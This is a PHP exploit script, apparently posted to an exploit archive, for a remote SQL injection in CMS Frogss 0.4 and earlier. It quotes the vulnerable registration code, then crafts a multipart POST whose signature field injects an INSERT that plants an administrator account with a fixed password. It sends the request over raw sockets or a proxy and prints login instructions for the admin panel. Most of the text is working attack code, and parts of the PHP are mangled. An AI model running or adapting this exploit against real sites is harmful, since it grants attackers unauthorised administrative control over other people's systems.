======================================================= CMS Frogss <= 0.4 (podpis) Remote SQL Injection Exploit ======================================================= module/rejestracja.php line 56-87: .... function ok() { global $login,$haslo,$email,$miasto,$www,$gg,$tlen,$poziom,$podpis,$last_log,$logowan,$komentarzy,$odwiedzin,$ip,$lan; $query=mysql_query("SELECT login FROM uzytkownicy WHERE login='".$login."'"); if (!$login) { echo 'Nie poda?e? Loginu'; } elseif (!$haslo){ echo 'Nie poda?e? has?a'; } elseif (!$email) { echo 'Nie poda?e? e-maila'; } elseif(mysql_num_rows($query)==0) { if($www=='http://') $www = ''; if($gg=='gg:') $gg = ''; if($tlen=='tlen:') $tlen = ''; $haslomd5 = md5($haslo); $ip = $_SERVER['REMOTE_ADDR']; $query1 = "INSERT INTO uzytkownicy VALUES(NOT NULL, '$login', '$haslomd5', '$email', '$miasto', '$www', '$gg', '$tlen', '$poziom', '$podpis', NOW(), '$last_log', '$logowan', '$komentarzy', '$odwiedzin', 'offline', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '0', '0', '0', '$ip')"; $result = mysql_query ($query1); if($result) { echo '
'.$lan['registration_add'].'
'; } else { echo '
'.$lan['registration_add_error'].'

'; } } else { .... when we register to new user in $podpis we can insert in SQL injection ;-) */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); ob_implicit_flush (1); function show($headeri) { $ii=0;$ji=0;$ki=0;$ci=0; echo ''; while ($ii <= strlen($headeri)-1){ $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) { echo ""; } else { echo " "; } $ii++;$ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "

&nbps;&nbps;	".htmlentities($headeri[$li+$ki])."
0".htmlentities($datai)."	".htmlentities($datai)."		".htmlentities($headeri[$li])."

"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket() { global $proxy, $host, $port, $packet, $html, $proxy_regex; $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($socket < 0) { echo "socket_create() failed: reason: " . socket_strerror($socket) . "
"; } else { $c = preg_match($proxy_regex,$proxy); if (!$c) {echo 'Not a valid proxy...'; die; } echo "OK.
"; echo "Attempting to connect to ".$host." on port ".$port."...
"; if ($proxy=='') { $result = socket_connect($socket, $host, $port); } else { $parts =explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $result = socket_connect($socket, $parts[0],$parts[1]); } if ($result < 0) { echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "

"; } else { echo "OK.

"; $html= ''; socket_write($socket, $packet, strlen($packet)); echo "Reading response:
"; while ($out= socket_read($socket, 2048)) {$html.=$out;} echo nl2br(htmlentities($html)); echo "Closing socket..."; socket_close($socket); } } } function refresh() { flush(); ob_flush(); usleep(5000000000); } function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.htmlentities($host); die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid prozy...';die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock);echo nl2br(htmlentities($html)); } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } $host=$_POST[host];$port=$_POST[port];$path=$_POST[path]; $USER=$_POST[USER];$PASS=$_POST[PASS];$proxy=$_POST[proxy]; echo ""; if (($host<>'') and ($path<>'')) { $port=intval(trim($port)); if ($port=='') {$port=80;} if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} } if (($host<>'') and ($path<>'') and ($USER<>'') and ($PASS<>'')) { $sql="') INSERT INTO uzytkownicy VALUES(1, Kacper, b98092e78aa47e68ae2ba617137960a4, [email protected], NULL, http://www.rahim.webd.pl/, NULL, NULL, 0, DEVILTEAM, NOW(), 99999, 99999, 99999, 9999, offline, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, 0, 4)/*"; $data='-----------------------------7d62702f250530 Content-Disposition: form-data; name="login"; '.$USER.' -----------------------------7d62702f250530 Content-Disposition: form-data; name="haslo"; '.$PASS.' -----------------------------7d62702f250530 Content-Disposition: form-data; name="email"; [email protected] -----------------------------7d62702f250530 Content-Disposition: form-data; name="miasto"; localhost -----------------------------7d62702f250530 Content-Disposition: form-data; name="www"; http://www.rahim.webd.pl/ -----------------------------7d62702f250530 Content-Disposition: form-data; name="gg"; 000000 -----------------------------7d62702f250530 Content-Disposition: form-data; name="tlen"; h20 -----------------------------7d62702f250530-- Content-Disposition: form-data; name="podpis"; '.$sql.' -----------------------------7d62702f250530-- Content-Disposition: form-data; name="Dodaj"; Dodaj -----------------------------7d62702f250530-- '; $packet ="POST ".$p."login.php HTTP/1.1\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Accept: text/plain\r\n"; $packet.="Referer: http://".$host.$path."index.php?lang=en\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.=$data; $packet.="Connection: Close\r\n"; show($packet); sendpacketii($packet); if (!eregi("Location:",$html)) {die("Failed to login...");} $temp=explode("Set-Cookie: ",$html); $COOKIE=''; for ($i=1; $i<=6; $i++) { $temp2=explode(" ",$temp[$i]); $COOKIE.=" ".$temp2[0]; } if (eregi("The user has successfully been added",$html)) { echo "exploit succeeded... now login as admin\n"; echo "with username \"Kacper"\" and password \"devilteam"\"\n"; echo ".$host."/Administracja/index.php\"\n"; echo "Greetz ;-)"\n"; } ?> # 0day.today [2018-04-02] #

Query Builder